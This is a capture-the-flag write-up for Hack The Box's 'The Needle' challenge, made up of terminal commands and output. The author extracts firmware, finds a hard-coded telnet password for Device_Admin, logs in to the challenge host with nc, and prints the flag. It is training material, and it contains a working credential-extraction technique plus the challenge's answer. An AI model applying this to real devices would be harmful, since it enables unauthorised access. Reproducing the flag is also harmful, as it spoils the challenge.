💉The Needle
https://app.hackthebox.com/challenges/The%2520Needle
╰─ file firmware.bin ─╯
firmware.bin: Linux kernel ARM boot executable zImage (big-endian)╰─ binwalk -e firmware.bin
...╰─ grep -rn "./" -e login ─╯
grep: ./squashfs-root/bin/busybox: binary file matches
./squashfs-root/bin/config_generate:231: set system.@system[-1].ttylogin='0'
./squashfs-root/etc/config/rpcd:2:config login
./squashfs-root/etc/inittab:3:::askconsole:/usr/libexec/login.sh
./squashfs-root/etc/profile:40:in order to prevent unauthorized SSH logins.
./squashfs-root/etc/scripts/telnetd.sh:7: if [ -f "/usr/sbin/login" ]; then
./squashfs-root/etc/scripts/telnetd.sh:9: telnetd -l "/usr/sbin/login" -u Device_Admin:$sign -i $lf &
grep: ./squashfs-root/lib/libc.so: binary file matches
...╰─ find ./ -name sign ─╯
./squashfs-root/etc/config/sign
./squashfs-root-0/etc/config/sign
...
╰─ cat ./squashfs-root/etc/config/sign ─╯
qS6-X/n]u>fVfAt!╰─ nc 83.136.251.197 42886 ─╯
��������
ng-1874835-hwtheneedle-lhjwv-cf4d688c7-xlwxl login: Device_Admin
Device_Admin
Password: qS6-X/n]u>fVfAt!
ng-1874835-hwtheneedle-lhjwv-cf4d688c7-xlwxl:~$ ^[[30;49RLS
LS
-ash: LS: not found
ng-1874835-hwtheneedle-lhjwv-cf4d688c7-xlwxl:~$ ^[[30;49Rls
ls
flag.txt
ng-1874835-hwtheneedle-lhjwv-cf4d688c7-xlwxl:~$ ^[[30;49Rcat flag.txt
cat flag.txt
HTB{4_hug3_blund3r_d289a1_!!}
ng-1874835-hwtheneedle-lhjwv-cf4d688c7-xlwxl:~$ ^[[30;49RLast updated